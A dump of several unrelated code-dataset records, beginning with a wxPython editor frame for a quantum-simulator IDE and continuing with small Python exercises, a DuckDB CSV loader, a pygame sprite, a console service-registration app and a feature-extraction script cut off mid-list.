'F10'),\n 'Close' : (wx.ACCEL_CTRL, ord('W'), 'Ctrl-W'),\n 'Save' : (wx.ACCEL_CTRL, ord('S'), 'Ctrl-S'),\n 'SaveAs' : (wx.ACCEL_ALT, ord('S'), 'Alt-S'),\n 'CheckSource' : (wx.ACCEL_NORMAL, wx.WXK_F2, 'F2'),\n 'Debug' : (wx.ACCEL_NORMAL, wx.WXK_F4, 'F4'),\n 'DebugOut' : (wx.ACCEL_NORMAL, wx.WXK_F6, 'F6'),\n 'DebugStep' : (wx.ACCEL_NORMAL, wx.WXK_F7, 'F7'),\n 'DebugOver' : (wx.ACCEL_NORMAL, wx.WXK_F8, 'F8'),\n 'DebugPause' : (wx.ACCEL_SHIFT, wx.WXK_F4, 'Shift-F4'),\n 'DebugStop' : (wx.ACCEL_CTRL|wx.ACCEL_SHIFT, wx.WXK_F4, 'Ctrl-Shift-F4'),\n 'SwitchToApp' : (wx.ACCEL_ALT, ord('A'), 'Alt-A'),\n#--General----------------------------------------------------------------------\n 'ContextHelp' : (wx.ACCEL_NORMAL, wx.WXK_F1, 'F1'),\n 'Open' : (wx.ACCEL_CTRL, ord('O'), 'Ctrl-O'),\n 'Insert' : (wx.ACCEL_NORMAL, wx.WXK_INSERT, 'Ins'),\n 'Delete' : (wx.ACCEL_NORMAL, wx.WXK_DELETE, 'Del'),\n 'Escape' : (wx.ACCEL_NORMAL, wx.WXK_ESCAPE, 'Esc'),\n 'NextPage' : (wx.ACCEL_CTRL, ord('K'), 'Ctrl-K'),\n 'PrevPage' : (wx.ACCEL_CTRL, ord('J'), 'Ctrl-J'),\n 'Inspector' : (wx.ACCEL_NORMAL, wx.WXK_F11, 'F11'),\n 'Designer' : (wx.ACCEL_NORMAL, wx.WXK_F12, 'F12'),\n 'Editor' : (wx.ACCEL_NORMAL, wx.WXK_F12, 'F12'),\n 'GotoLine' : (wx.ACCEL_CTRL, ord('G'), 'Ctrl-G'),\n 'HelpFind' : (wx.ACCEL_CTRL, ord('H'), 'Ctrl-H'),\n 'GotoExplorer': (wx.ACCEL_CTRL, ord('E'), 'Ctrl-E'),\n 'GotoShell' : (wx.ACCEL_CTRL, ord('P'), 'Ctrl-P'),\n 'CloseView' : (wx.ACCEL_CTRL, ord('Q'), 'Ctrl-Q'),\n#--Clipboard--------------------------------------------------------------------\n 'Cut' : (wx.ACCEL_SHIFT, wx.WXK_DELETE, 'Shift-Del'),\n 'Copy' : (wx.ACCEL_CTRL, wx.WXK_INSERT, 'Ctrl-Ins'),\n 'Paste' : (wx.ACCEL_SHIFT, wx.WXK_INSERT, 'Shift-Ins'),\n#--Designer---------------------------------------------------------------------\n 'MoveLeft' : (wx.ACCEL_CTRL, wx.WXK_LEFT, 'Ctrl-Left'),\n 'MoveRight' : (wx.ACCEL_CTRL, wx.WXK_RIGHT, 'Ctrl-Right'),\n 'MoveUp' : (wx.ACCEL_CTRL, wx.WXK_UP, 'Ctrl-Up'),\n 'MoveDown' : (wx.ACCEL_CTRL, wx.WXK_DOWN, 'Ctrl-Down'),\n 'WidthDec' : (wx.ACCEL_SHIFT, wx.WXK_LEFT, 'Shift-Left'),\n 'WidthInc' : (wx.ACCEL_SHIFT, wx.WXK_RIGHT, 'Shift-Right'),\n 'HeightInc' : (wx.ACCEL_SHIFT, wx.WXK_DOWN, 'Shift-Down'),\n 'HeightDec' : (wx.ACCEL_SHIFT, wx.WXK_UP, 'Shift-Up'),\n 'SelectLeft' : (wx.ACCEL_NORMAL, wx.WXK_LEFT, 'Left'),\n 'SelectRight' : (wx.ACCEL_NORMAL, wx.WXK_RIGHT, 'Right'),\n 'SelectDown' : (wx.ACCEL_NORMAL, wx.WXK_DOWN, 'Down'),\n 'SelectUp' : (wx.ACCEL_NORMAL, wx.WXK_UP, 'Up'),\n#--Shell------------------------------------------------------------------------\n 'HistoryUp' : (wx.ACCEL_CTRL, wx.WXK_UP, 'Ctrl-Up'),\n 'HistoryDown' : (wx.ACCEL_CTRL, wx.WXK_DOWN, 'Ctrl-Down'),\n}\n\ndef socketFileOpenServerListen(editor):\n # self.closed, self.listener = socketFileOpenServerListen(self)\n closed = threading.Event()\n listener = Listener(editor, closed)\n listener.start()\n return closed, listener\n\n\nsocketPort = 50007\nselectTimeout = 0.25\nclass Listener(threading.Thread):\n def __init__(self, editor, closed):\n #self.queue = queue\n self.editor = editor\n self.closed = closed\n threading.Thread.__init__(self)\n\n def run(self, host='127.0.0.1', port=socketPort):\n import socket\n from select import select\n # Open a socket and listen.\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n s.bind((host, port))\n except socket.error as err:\n self.closed.set()\n return\n\n s.listen(5)\n while 1:\n while 1:\n # Listen for 0.25 s, then check if closed is set. In that case,\n # end thread by returning.\n ready, dummy, dummy = select([s],[],[], selectTimeout)\n if self.closed.isSet():\n return\n if ready:\n break\n\n # Accept a connection, read the data and put it into the queue.\n conn, addr = s.accept()\n l = []\n while 1:\n data = conn.recv(1024)\n if not data: break\n l.append(data)\n name = ''.join(l)\n if name.strip():\n wx.CallAfter(self.editor.openOrGotoModule, name)\n conn.close()\n\n\nclass Editor(wx.MDIChildFrame):\n \"\"\" Source code editor and host for the Model/View/Controller classes\"\"\"\n\n editorTitle = 'Editor'\n editorIcon = '../Images/Icons/Editor.ico'\n\n openBmp = 'Images/Editor/Open.png'\n backBmp = '../Images/Shared/Previous.png'\n forwBmp = '../Images/Shared/Next.png'\n recentBmp = 'Images/Editor/RecentFiles.png'\n helpBmp = '../Images/Shared/Help.png'\n helpIdxBmp = '../Images/Shared/CustomHelp.png'\n ctxHelpBmp = 'Images/Shared/ContextHelp.png'\n tipBmp = '../Images/Shared/Tip.png'\n aboutBmp = '../Images/Shared/About.png'\n shellBmp = 'Images/Editor/Shell.png'\n explBmp = '../Images/Editor/Explorer.png'\n inspBmp = '../Images/Shared/Inspector.png'\n paletteBmp = '../Images/Shared/Palette.png'\n prefsBmp = '../Images/Modules/PrefsFolder.png'\n\n\n def setDefaultSize(self):\n paletteHeight = 120\n editorScreenWidthPerc = 0.73\n screenX, screenY, screenWidth, screenHeight = wx.GetClientDisplayRect()\n # edWidth = int(screenWidth * editorScreenWidthPerc)\n edWidth = screenWidth\n inspWidth = screenWidth - edWidth + 1\n underPalette = paletteHeight + screenY\n bottomHeight = screenHeight - paletteHeight - 65\n windowManagerSide = 5\n left = inspWidth + windowManagerSide*2 + screenX - 10\n self.SetSize(0, underPalette + screenY,\n edWidth, bottomHeight)\n\n def __init__(self, parent, gateMediator, quantum_computer):\n\n wx.MDIChildFrame.__init__(self,name='', parent=parent,\n pos=wx.Point(68, 72), size=wx.Size(810, 515),\n style=wx.SIMPLE_BORDER)\n self.gateMediator = gateMediator\n gateMediator.set_editor(self)\n self.setDefaultSize()\n self.modelImageList = wx.ImageList(height=16, width=16)\n self.blankEditMenu = wx.Menu(title='')\n self.blankViewMenu = wx.Menu(title='')\n self.helpMenu = wx.Menu(title='')\n self.toolsMenu = wx.Menu(title='')\n\n self.mainMenu = wx.MenuBar()\n self.mainMenu.Append(menu=wx.Menu(), title='File')\n self.mainMenu.Append(menu=wx.Menu(), title='Edit')\n self.mainMenu.Append(menu=wx.Menu(), title='Views')\n self.mainMenu.Append(menu=self.toolsMenu, title='Tools')\n self.SetMenuBar(self.mainMenu)\n\n self.statusBar = EditorStatusBar(id=wxID_EDITORFRAMESTATUSBAR,\n name='statusBar', parent=self, style=0)\n\n # self.toolBar = EditorToolBar(id=wxID_EDITORFRAMETOOLBAR, name='toolBar',\n # parent=self, pos=wx.Point(0, 0), size=wx.Size(802, 250),\n # style=wx.TB_HORIZONTAL | wx.NO_BORDER)\n\n self.tabs = wx.Notebook(id=wxID_EDITORFRAMETABS, name='tabs',\n parent=self, pos=wx.Point(2, 2), size=wx.Size(798,\n 417), style=wx.CLIP_CHILDREN)\n\n self.tabs.Bind(wx.EVT_NOTEBOOK_PAGE_CHANGED,\n self.OnTabsNotebookPageChanged, id=wxID_EDITORFRAMETABS)\n\n\n self.SetStatusBar(self.statusBar)\n # self.SetToolBar(self.toolBar)\n self.SetIcon(wx.Icon(self.editorIcon))\n\n self.toolAccels = []\n self.tools = {}\n self.numFixedPages = 0\n\n # Explorer\n self.circuitStd = self.addExplorerPage('Circuit Builder', gateMediator=gateMediator, Page=CircuitStd_, quantum_computer=quantum_computer)\n self.notepad = self.addExplorerPage('Code Editor', gateMediator=gateMediator, Page=Notepad, quantum_computer=quantum_computer)\n # self.circuit = self.addExplorerPage('Circuit', gateMediator, Page=Circuit)\n\n self.winDimsMenu = wx.Menu()\n self.winDimsMenu.Append(wxID_EDITORWINDIMSLOAD, 'Load',\n 'Load window dimensions from the config.')\n self.winDimsMenu.Append(wxID_EDITORWINDIMSSAVE, 'Save',\n 'Save window dimensions to the config.')\n self.winDimsMenu.Append(wxID_EDITORWINDIMSRESDEFS,\n 'Restore defaults', 'Restore dimensions to defaults')\n\n self.winMenu =wx.Menu()\n appendMenuItem(self.winMenu, wxID_EDITORSWITCHPALETTE,\n 'Palette', '', self.paletteBmp, 'Switch to the Palette frame.')\n appendMenuItem(self.winMenu, wxID_EDITORSWITCHINSPECTOR,\n 'Inspector', keyDefs['Inspector'], self.inspBmp,\n 'Switch to the Inspector frame.')\n self.winMenu.AppendSeparator()\n\n appendMenuItem(self.winMenu, wxID_EDITORBROWSEBACK,\n 'Browse back', (), self.backBmp, #\\t%s'%keyDefs['BrowseBack'][2],\n 'Go back in browsing history stack')\n appendMenuItem(self.winMenu, wxID_EDITORBROWSEFWD,\n 'Browse forward', (), self.forwBmp, #\\t%s'%keyDefs['BrowseFwd'][2],\n 'Go forward in browsing history stack')\n appendMenuItem(self.winMenu, wxID_EDITORPREVPAGE,\n 'Previous page', keyDefs['PrevPage'], '-',\n 'Switch to the previous page of the main notebook')\n appendMenuItem(self.winMenu, wxID_EDITORNEXTPAGE,\n 'Next page', keyDefs['NextPage'], '-',\n 'Switch to the next page of the main notebook')\n self.winMenu.AppendSeparator()\n self.winMenu.Append(wxID_EDITORWINDIMS,\n 'All window dimensions', self.winDimsMenu,\n 'Load, save or restore IDE windows dimensions')\n self.winMenu.Append(wxID_EDITORHIDEPALETTE,\n 'Hide Palette', 'Hide the Palette frame')\n self.winMenu.AppendSeparator()\n self.mainMenu.Append(self.winMenu, 'Windows')\n\n # Help menu\n appendMenuItem(self.helpMenu, wxID_EDITORHELP, 'Help',\n (), self.helpBmp, 'Opens help for the Editor')\n self.helpMenu.Append(wxID_EDITORHELPGUIDE,\n 'Getting started guide', 'Opens the Getting started guide')\n self.helpMenu.AppendSeparator()\n appendMenuItem(self.helpMenu, wxID_EDITORHELPFIND,\n 'Find in index...', keyDefs['HelpFind'], self.helpIdxBmp,\n 'Pops up a text input for starting a search of the help indexes')\n self.helpMenu.Append(wxID_EDITORHELPOPENEX, 'Open an example...',\n 'Opens file dialog in the Examples directory')\n appendMenuItem(self.helpMenu, wxID_EDITORHELPTIPS,\n 'Tips', (), self.tipBmp, 'Opens the \"Tip of the Day\" window')\n self.helpMenu.AppendSeparator()\n appendMenuItem(self.helpMenu, wxID_EDITORHELPABOUT,\n 'About', (), self.aboutBmp, 'Opens the About box')\n\n helpMenuTitleName = 'Help'\n self.mainMenu.Append(self.helpMenu, helpMenuTitleName)\n\n # create initial toolbar buttons and menus\n dt = FileDropTarget(self)\n self.SetDropTarget(dt)\n\n self.tabs.SetMinSize(wx.DefaultSize)\n\n def switch_to_circuit_view(self):\n self.tabs.SetSelection(0)\n\n def switch_to_notepad_view(self):\n self.tabs.SetSelection(1)\n\n def stimula(self, shouldStimulate, gate = None):\n self.circuitStd.stimula(shouldStimulate, gate)\n\n\n def OnTabsNotebookPageChanged(self, ev):\n pass\n\n\n def OnHelpToolClick(self, ev):\n pass\n\n def OnWxWinHelpToolClick(self, ev):\n pass\n\n def OnPythonHelpToolClick(self, ev):\n pass\n\n def addExplorerPage(self, name, gateMediator, Page, quantum_computer):\n explorerPage = Page(self.tabs, gateMediator, quantum_computer)\n self.tabs.AddPage(explorerPage, name, imageId=wx.NewId())\n self.numFixedPages += 1\n return explorerPage\n\n\nsbfIcon, sbfBrwsBtns, sbfStatus, sbfCrsInfo, sbfProgress = range(5)\n\nclass EditorStatusBar(wx.StatusBar):\n \"\"\" Displays information about the current view. Also global stats/\n progress bar etc. \"\"\"\n maxHistorySize = 250\n def __init__(self, *_args, **_kwargs):\n wx.StatusBar.__init__(self, _kwargs['parent'], _kwargs['id'], style=wx.STB_SIZEGRIP)\n self.SetFieldsCount(6)\n imgWidth = 16\n\n self.SetStatusWidths([imgWidth, 36, 400, 25, 150, -1])\n\n rect = self.GetFieldRect(sbfIcon)\n self.img = wx.StaticBitmap(self, -1,\n wx.Image('../Images/Shared/BoaLogo.png').ConvertToBitmap(),\n (rect.x+1, rect.y+1), (16, 16))\n\n rect = self.GetFieldRect(sbfBrwsBtns)\n self.historyBtnBack = wx.BitmapButton(self, -1,\n wx.Image('../Images/Shared/PreviousSmall.png').ConvertToBitmap(),\n (rect.x+1, rect.y+1), (int(round(rect.width/2.0))-1, rect.height-2))\n self.historyBtnFwd = wx.BitmapButton(self, -1,\n wx.Image('../Images/Shared/NextSmall.png',wx.BITMAP_TYPE_PNG).ConvertToBitmap(),\n (rect.x+1+int(round(rect.width/2.0)), rect.y+1), (int(round(rect.width/2.0))-1, rect.height-2))\n\n tip = 'Browse the Traceback/Error/Output window history.'\n self.historyBtnBack.SetToolTip(tip)\n self.historyBtnFwd.SetToolTip(tip)\n\n self.erroutFrm = None\n\n self.progress = wx.Gauge(self, -1, 100)\n self.linkProgressToStatusBar()\n\n self.images = {'Info': wx.Image('../Images/Shared/Info.png', wx.BITMAP_TYPE_PNG).ConvertToBitmap(),\n 'Warning': wx.Image('../Images/Shared/Warning.png',wx.BITMAP_TYPE_PNG).ConvertToBitmap(),\n 'Error': wx.Image('../Images/Shared/Error.png',wx.BITMAP_TYPE_PNG).ConvertToBitmap()}\n self.history = []\n self._histcnt = 0\n\n def linkProgressToStatusBar(self):\n rect = self.GetFieldRect(sbfProgress)\n self.progress.SetSize(rect.x+1, rect.y+1, rect.width -2, rect.height -2)\n\n\nclass EditorToolBar(wx.ToolBar):\n def __init__(self, *_args, **_kwargs):\n frame = _kwargs['parent']\n wx.ToolBar.__init__(self, frame, _kwargs['id'],\n style=wx.TB_HORIZONTAL | wx.NO_BORDER|wx.TB_FLAT)\n self.toolLst = []\n self.toolCount = 0\n self.SetToolBitmapSize((16, 16))\n AddToolButtonBmpObject(frame, self,wx.Image('../Images/Shared/Previous.png').ConvertToBitmap(), 'Python help', frame.OnPythonHelpToolClick)\n AddToolButtonBmpObject(frame, self,wx.Image('../Images/Shared/Next.png').ConvertToBitmap(), 'Python help', frame.OnPythonHelpToolClick)\n AddToolButtonBmpObject(frame, self,wx.Image('../Images/Shared/Delete.png').ConvertToBitmap(), 'Python help', frame.OnPythonHelpToolClick)\n AddToolButtonBmpObject(frame, self, wx.Image('../Images/Shared/Help.png').ConvertToBitmap(), 'Simulator or selected component help', frame.OnHelpToolClick)\n AddToolButtonBmpObject(frame, self, wx.Image('../Images/Shared/wxWinHelp.png').ConvertToBitmap(), 'wxPython help', frame.OnWxWinHelpToolClick)\n AddToolButtonBmpObject(frame, self,wx.Image('../Images/Shared/PythonHelp.png').ConvertToBitmap(), 'Python help', frame.OnPythonHelpToolClick)\n self.Realize()\n\n def AddSeparator(self):\n wx.ToolBar.AddSeparator(self)\n self.toolLst.append(-1)\n self.toolCount = self.toolCount + 1\n\n def DeleteTool(self, id):\n wx.ToolBar.DeleteTool(self, id)\n self.toolLst.remove(id)\n self.toolCount = self.toolCount - 1\n\n def ClearTools(self):\n posLst = range(self.toolCount)\n # posLst.reverse()\n for pos in posLst:\n self.DeleteToolByPos(pos)\n\n self.DisconnectToolIds()\n\n self.toolLst = []\n self.toolCount = 0\n\n def GetToolPopupPosition(self, id):\n margins = self.GetMargins() # self.GetToolMargins()\n toolSize = self.GetToolSize()\n xPos = margins.x\n for tId in self.toolLst:\n if tId == id:\n return wx.Point(xPos, margins.y + toolSize.y)\n\n if tId == -1:\n xPos = xPos + self.GetToolSeparation()\n else:\n xPos = xPos + toolSize.x\n\n return wx.Point(0, 0)\n\n def PopupToolMenu(self, toolId, menu):\n self.PopupMenu(menu, self.GetToolPopupPosition(toolId))\n\n def DisconnectToolIds(self):\n for wid in self.toolLst:\n if wid != -1:\n self.GetParent().Disconnect(wid)\n\n\nclass FileDropTarget(wx.FileDropTarget):\n def __init__(self, editor):\n wx.FileDropTarget.__init__(self)\n self.editor = editor\n\n def OnDropFiles(self, x, y, filenames):\n wx.BeginBusyCursor()\n try:\n for filename in filenames:\n # self.editor.openOrGotoModule(filename)\n print (filename)\n finally:\n wx.EndBusyCursor()\n return True","repo_name":"DarthThanatos/QuantumSimulator","sub_path":"view/Editor.py","file_name":"Editor.py","file_ext":"py","file_size_in_byte":19363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"931951629","text":"#Desafio 082: Crie um programa que vai ler vários números e colocar em uma lista. Depois disso, crie duas listas extras que vão conter apenas os valores pares e os valores impares digitados, respectivamente. Ao final, mostre o conteúdo dos três listas geradas.\n\n#RESOLUÇÃO PESSOAL\nlista = []\nimpares = []\npares = []\nwhile True:\n n = int(input('Digite um valor inteiro: '))\n lista.append(n)\n if n%2==0:\n pares.append(n)\n else: \n impares.append(n)\n\n quest = str(input('Quer continuar? [S/N] ')).strip().upper()\n if quest == 'N':\n break\n\nprint(f'Conjunto com os valores: {lista}')\nprint(f'Subconjunto com os valores impares: {impares}')\nprint(f'Subconjunto com os valores pares: {pares}')\n\n","repo_name":"gustavocamalionti/Curso-em-Video","sub_path":"back-end/python3/Mundo III/Desafios/82 - (Dividindo Valores em Várias Listas).py","file_name":"82 - (Dividindo Valores em Várias Listas).py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"21927280578","text":"# MOVE THE TABLES FROM LANDING PERSISTANT TO FORMATTED\n# CHANGE THE FORMAT OF THE TABLES TO DUCKDB\n\n# import libraries\nimport sys\nimport os\nimport duckdb\n\ndef StoreLogPers(tbl, file):\n file.write(tbl + \"\\n\")\n\n\n# it stores the csv tables in the landing zone in a duckdb database\ndef ProcessCSV(Datasource, Connection, Files, LogWriter):\n\n id = Datasource[\"id\"]\n # csv delimiter\n delim = Datasource[\"delim\"] if \"delim\" in Datasource else \",\"\n \n for file in Files:\n tablename = file.split(\".\")[0]\n Connection.execute(f\"\"\"\n CREATE TABLE test_{tablename}\n AS SELECT * FROM read_csv_auto(\n './data/landing_pers/{id}/{file}',\n HEADER = TRUE,\n SAMPLE_SIZE=-1,\n DELIM = '{delim}'\n ) \n \"\"\")\n StoreLogPers(file, LogWriter)\n \n\ndef LandingPers2Formatted(Objects):\n\n # list of files already processed:\n processedFiles = []\n with open('logs/processed_data_persistant.txt', \"r\") as f0:\n for line in f0:\n processedFiles.append(line.rstrip())\n\n # open file to store logs in append mode\n f = open('logs/processed_data_persistant.txt', \"a\")\n\n # process datasets:\n for datasource in Objects:\n id = datasource[\"id\"]\n format = datasource[\"format\"]\n\n # files to process:\n files = [file for file in os.listdir(f'data/landing_pers/{id}') if not file in processedFiles]\n if len(files) == 0:\n continue\n\n # open database connection\n con = duckdb.connect(database=f\"data/formatted/db_{id}.db\", read_only=False)\n \n if format == \"csv\":\n ProcessCSV(datasource, con, files, f)\n #elif format == \"xlsx\":\n # ProcessXLSX(datasource, con, files, f)\n else:\n print(f\"Format {format} is not supported\\nSupported formats: csv\")\n\n # close database\n con.close()\n\n f.close()\n\n\nif __name__ == \"__main__\":\n sys.path.append('..')\n sys.path.append('.')\n from helper import *\n\n setwd()\n Objects = Objects()\n LandingPers2Formatted(Objects)\n","repo_name":"adriamd/ADSDB_project1","sub_path":"scripts/formatted.py","file_name":"formatted.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3567839416","text":"import re\n\n# tipo de dato que representa un servicio y que puede ser utilizado en el programa para almacenar y manipular información sobre un servicio.\nclass Servicio:\n def __init__(self, datos):\n #Metodo constructor->inicializa los valores de una instancia\n self.titulo = datos[\"titulo\"]\n self.descripcion = datos[\"descripcion\"]\n self.ubicacion = datos[\"ubicacion\"]\n self.precio = datos[\"precio\"]\n self.fecha_hora = datos[\"fecha_hora\"]\n self.tipo = datos[\"tipo\"]\n\n \nclass Interfaz:\n #MENU DEL SITIO WEB\n def mostrar_menu(self):\n menu = \"\"\"\n BIENVENIDO A TURISMO\n 1- Registrar servicio\n 2- Contratar servicio\n 3- Salir\n\n SELECCIONE UNA OPCION:\n \"\"\"\n self.opcion = input(menu)\n\n while self.opcion not in [\"1\", \"2\", \"3\"]:\n print(\"Opcion incorrecta\")\n self.opcion = input(menu)\n\n return self.opcion\n \n def registrar_servicio(self):\n print(\"Ingrese los siguientes datos:\")\n titulo = input(\"Título: \")\n descripcion = input(\"Descripción: \")\n ubicacion = input(\"Ubicación: \")\n\n precio = input(\"Precio: \")\n while not re.match(r'^\\d+(?:\\.\\d{1,2})?$', precio):\n print(\"Error: el precio debe ser un número válido con hasta dos decimales.\")\n precio = input(\"Precio: \")\n precio = float(precio)\n\n fecha_hora = input(\"Fecha y Hora (DD/MM/AAAA HH:MM): \")\n while not re.match(r'^\\d{2}/\\d{2}/\\d{4}\\s\\d{2}:\\d{2}$', fecha_hora):\n print(\"Error: la fecha y hora deben estar en el formato DD/MM/AAAA HH:MM.\")\n fecha_hora = input(\"Fecha y Hora (DD/MM/AAAA HH:MM): \")\n\n tipo = input(\"Tipo: \")\n\n # Comprobar que los campos obligatorios no estén en blanco\n if not titulo or not descripcion or not ubicacion or not tipo:\n print(\"Error: todos los campos son obligatorios.\")\n return self.registrar_servicio() # Volver a solicitar al usuario que ingrese los datos\n\n return {\"titulo\": titulo,\n \"descripcion\": descripcion,\n \"ubicacion\": ubicacion,\n \"precio\": precio,\n \"fecha_hora\": fecha_hora,\n \"tipo\": tipo}\n \n def mostrar_servicios(self, servicios):\n if not servicios:\n print(\"No hay servicios registrados\")\n else:\n print(\"\\n--------------------------------\")\n print(\"SERVICIOS DISPONIBLES\")\n for id_servicio, servicio in servicios.items():\n print(f\"ID: {id_servicio} - Título: {servicio.titulo} - Descripcion: {servicio.descripcion} - Precio: {servicio.precio} - Fecha y hora: {servicio.fecha_hora}\")\n print(\"--------------------------------\")\n\n\n\nclass Controller:\n def __init__(self):\n #Diccionario de servicios->BD\n self.servicios = {}\n #Instancia de la clase interfaz\n self.interfaz = Interfaz()\n\n def registrar_servicio(self):\n datos = self.interfaz.registrar_servicio()\n #objeto Servicio con los datos ingresados por el usuario\n servicio = Servicio(datos)\n\n # ALMACENAR SERVICIO EN LA BD\n #identificador único para el nuevo servicio\n id_servicio = len(self.servicios) + 1\n #agrega el nuevo servicio a la base de datos utilizando ese identificador único como clave.\n self.servicios[id_servicio] = servicio\n\n print(\"El servicio ha sido registrado con éxito\")\n\n def mostrar_servicios(self):\n self.interfaz.mostrar_servicios(self.servicios)\n\ndef main():\n #Instancias\n controller = Controller()\n interfaz = Interfaz()\n\n while True:\n opcion = interfaz.mostrar_menu()\n\n if opcion == \"1\":\n controller.registrar_servicio()\n elif opcion == \"2\":\n controller.mostrar_servicios()\n elif opcion == \"3\":\n break\n else:\n pass\n\nif __name__ == '__main__':\n main()","repo_name":"Alvaro0219/Dis-de-sistemas","sub_path":"Diagnostico/RegistrarServicio/Registrar_servicio.py","file_name":"Registrar_servicio.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"69885529733","text":"from typing import List\nfrom functools import lru_cache\n\n\ndef calcArea(s, e, h):\n return (e - s) * min(h[e], h[s])\n\n\nclass Solution:\n def maxArea(self, height: List[int]):\n length = len(height) - 1\n\n @lru_cache(None)\n def findMaxArea(start, end):\n if end <= start or start < 0 or end > length:\n return 0\n\n this_area = calcArea(start, end, height)\n prev_area = 0\n if height[end] > height[start]:\n prev_area = findMaxArea(start + 1, end)\n elif height[end] < height[start]:\n prev_area = findMaxArea(start, end - 1)\n else:\n prev_area = max(\n findMaxArea(start + 1, end), findMaxArea(start, end - 1)\n )\n return max(this_area, prev_area)\n\n return findMaxArea(0, length)\n\n\ns = Solution()\ni = [4, 3, 2, 1, 4]\no = s.maxArea(i)\n\nprint(o)","repo_name":"vincent-kk/Basic-Algorithm","sub_path":"03. DP/11. Container With Most Water.py","file_name":"11. Container With Most Water.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"17755206247","text":"import math\nimport pygame\nfrom pygEngine.vector2D import Vector2D\nfrom pygEngine.transform import Transform\nfrom pygEngine.imageLoader import ImageLoader\nfrom pygEngine.triangleCollider import TriangleCollider\nfrom pygEngine._gameObjects.staticGameObject import StaticGameObject\nfrom pygame.locals import *\nclass Explosion(StaticGameObject):\n\n\tdef __init__(self,transform, params):\n\t\tStaticGameObject.__init__(self, transform, params)\n\n\tdef setup(self):\n\t\tself.lifetime = 0.15\n\t\tself.bodyTexture = ImageLoader.get('Explosion')\n\t\tself.rotateSpeed = 1\n\t\tself.speed = 500\n\t\tself.bodyTexture.convert()\n\t\tself.params.life = 0\n\n\tdef getParams(self):\n\t\treturn (self.transform, self.team, self.layer, self.life, self.__class__.__name__)\n\n\tdef draw(self, main, offset = Vector2D.zero()):\n\t\tscreen = main.screen\n\t\tim = pygame.transform.scale(self.bodyTexture.copy(), (int(self.bodyTexture.get_width()*self.params.life/self.lifetime),int(self.bodyTexture.get_height()*self.params.life/self.lifetime)))\n\t\tim.set_colorkey((0, 0, 0))\n\t\tscreen.blit(im, (self.transform.pos.x + offset.x -im.get_width()/2, self.transform.pos.y + offset.y - im.get_height()/2))\n\n\tdef update(self, dt, main):\n\t\tif self.params.life > self.lifetime:\n\t\t\tself.removeGameObject(self, main)\n\t\telse:\n\t\t\tself.params.life += dt\nif __name__ == \"__main__\":\n\tprint('Nothing to do...')","repo_name":"Fran6nd/pyTank","sub_path":"explosion.py","file_name":"explosion.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74405704448","text":"# Comando abaixo limpa o terminal antes de executar o próximo código\nprint(\"\\x1bc\")\n\ndef saudacao(msg, nome):\n print(f\"\\n{msg}, {nome}\\n\")\n\ndef verificaDigito(msg, nome):\n if msg.isdigit() == False and msg.isdigit() == False:\n return True\n else:\n return False\n\nwhile True:\n msg = input(\"Saudacao: \")\n nome = input(\"Nome: \")\n\n valor = verificaDigito(msg, nome)\n if valor == True:\n saudacao(msg, nome)\n else:\n print(\"valor invalido, tente novamente, mais tarde.\")\n break\n\n","repo_name":"hellboy89/Python","sub_path":"Aulas_LuizMiranda-Udemy/aula054/exercicio1.py","file_name":"exercicio1.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24909774852","text":"import csv\r\nimport math\r\nimport numpy as np\r\nimport random\r\nfrom sklearn import svm\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import cross_val_score\r\n\r\nfrom sklearn.feature_selection import SelectKBest\r\nfrom sklearn.feature_selection import chi2\r\n\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.manifold import TSNE\r\n\r\n\r\ndef myfind(x, y):\r\n idx = []\r\n for row in list(range(len(y))):\r\n if y[row] == x:\r\n idx.append(row)\r\n return idx\r\n\r\n\r\ncate = 669\r\nuserFile = \"withBrandGiveTagOfCate\" + str(cate) + \".csv\"\r\nuserInfo = csv.reader(open(userFile, 'r'))\r\n\r\nfeatureLength = 35\r\nunusedFeatureList = [0, 2, 3]\r\ntimestampFeatureList = [13, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34] # 11\r\nnumFeatureList = [4, 5, 6, 7, 8, 9, 10, 11, 12, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24] # 20\r\n\r\ni = 0\r\nfeature = []\r\ny = []\r\ntrueNum = 0\r\nfraudNum = 0\r\nfor row in userInfo:\r\n if i == 0:\r\n i = i + 1\r\n continue\r\n else:\r\n if row[35] == \"True\":\r\n row[35] = 1\r\n trueNum = trueNum + 1\r\n elif row[35] == \"False\":\r\n row[35] = -1\r\n fraudNum = fraudNum + 1\r\n else:\r\n continue\r\n\r\n tag = [row[1], row[4], row[5], row[6], row[7], row[8], row[9], row[10], row[11], row[12], row[13], row[14],\r\n row[15], row[16], row[17], row[18], row[19], row[20], row[21], row[22], row[23], row[24], row[25],\r\n row[26], row[27], row[28], row[29], row[30], row[31], row[32], row[33], row[34]]\r\n tag = [abs(float(i)) for i in tag]\r\n feature.append(tag)\r\n y.append(row[35])\r\n\r\nuser_FeatureRecord = ['user', 'brand', 'user_Truthful', 'user_FraudBuyNum',\r\n 'user_BrandPv', 'user_BrandFav', 'user_BrandCart', 'user_BrandBuy',\r\n 'user_CatePv', 'user_CateFav', 'user_CateCart', 'user_CateBuy',\r\n 'user_ReBuyNum', 'user_ReBuyTimeGap',\r\n 'user_TimesFromPvToBuy', 'user_TimesFromFavToBuy', 'user_TimesFromCartToBuy',\r\n 'user_OtherNumFromPvToBuy', 'user_OtherNumFromFavToBuy', 'user_OtherNumFromCartToBuy',\r\n 'user_OtherNumFromBuyToBuy', 